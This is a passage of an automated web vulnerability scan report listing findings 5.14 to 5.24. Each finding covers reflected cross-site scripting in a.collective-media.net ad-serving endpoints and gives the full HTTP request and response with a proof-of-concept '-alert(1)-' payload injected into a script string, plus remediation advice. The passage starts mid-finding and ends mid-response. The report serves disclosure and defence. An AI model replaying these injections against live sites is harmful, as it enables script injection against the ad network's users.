Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:29:36 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:29:36 GMT
Content-Length: 1082

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
0A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=130512598962127'-alert(1)-'b24762db86e;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.14. http://a.collective-media.net/adj/cm.pub_webmd/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.pub_webmd/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c422f'-alert(1)-'497b77b4914 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.pub_webmdc422f'-alert(1)-'497b77b4914/;sz=160x600;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=175465420476&tile=175465420476&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 442
Vary: Accept-Encoding
Date: Wed, 11 May 2011 16:07:03 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 16:07:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.pub_webmdc422f'-alert(1)-'497b77b4914/;sz=160x600;net=cm;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.15. http://a.collective-media.net/adj/cm.pub_webmd/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.pub_webmd/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dc99'-alert(1)-'12df4a40eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.pub_webmd/;sz=160x600;ord=[timestamp]?&6dc99'-alert(1)-'12df4a40eda=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=175465420476&tile=175465420476&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Vary: Accept-Encoding
Date: Wed, 11 May 2011 16:06:56 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 16:06:56 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.pub_webmd/;sz=160x600;net=cm;ord=[timestamp]?&6dc99'-alert(1)-'12df4a40eda=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.16. http://a.collective-media.net/adj/cm.pub_webmd/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.pub_webmd/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66074'-alert(1)-'7179536e508 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.pub_webmd/;sz=160x600;ord=[timestamp]?66074'-alert(1)-'7179536e508 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=175465420476&tile=175465420476&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Vary: Accept-Encoding
Date: Wed, 11 May 2011 16:06:22 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 16:06:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.pub_webmd/;sz=160x600;net=cm;ord=[timestamp]?66074'-alert(1)-'7179536e508;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.17. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a497e'-alert(1)-'69cc317bee7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulsea497e'-alert(1)-'69cc317bee7/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;ord=681443252? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Wed, 11 May 2011 14:57:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:57:59 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulsea497e'-alert(1)-'69cc317bee7/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.18. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6e61'-alert(1)-'435ca0f1cc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911b6e61'-alert(1)-'435ca0f1cc1;srb=srb_jbl_news;sz=728x90;ord=681443252? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Wed, 11 May 2011 14:58:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:58:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911b6e61'-alert(1)-'435ca0f1cc1;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.19. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4d37'-alert(1)-'7d45719866d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;ord=681443252?&d4d37'-alert(1)-'7d45719866d=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 474
Date: Wed, 11 May 2011 14:57:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:57:41 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252?&d4d37'-alert(1)-'7d45719866d=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.20. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [srb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of the srb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdfce'-alert(1)-'2f90fc1dbf8 was submitted in the srb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;ord=681443252?cdfce'-alert(1)-'2f90fc1dbf8 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Wed, 11 May 2011 14:56:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:56:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252?cdfce'-alert(1)-'2f90fc1dbf8;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.21. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abd59'-alert(1)-'5bf498b1e30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinicabd59'-alert(1)-'5bf498b1e30/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Date: Wed, 11 May 2011 15:31:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:31 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinicabd59'-alert(1)-'5bf498b1e30/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.22. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3132'-alert(1)-'b9b8459dcf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevisione3132'-alert(1)-'b9b8459dcf3/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Date: Wed, 11 May 2011 15:31:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevisione3132'-alert(1)-'b9b8459dcf3/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.23. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a81'-alert(1)-'553a259d848 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevision/general26a81'-alert(1)-'553a259d848;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:31:36 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:36 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general26a81'-alert(1)-'553a259d848;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.24. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [cmn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of the cmn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53ce5'-alert(1)-'ddc0eb33dd9 was submitted in the cmn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012?53ce5'-alert(1)-'ddc0eb33dd9 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
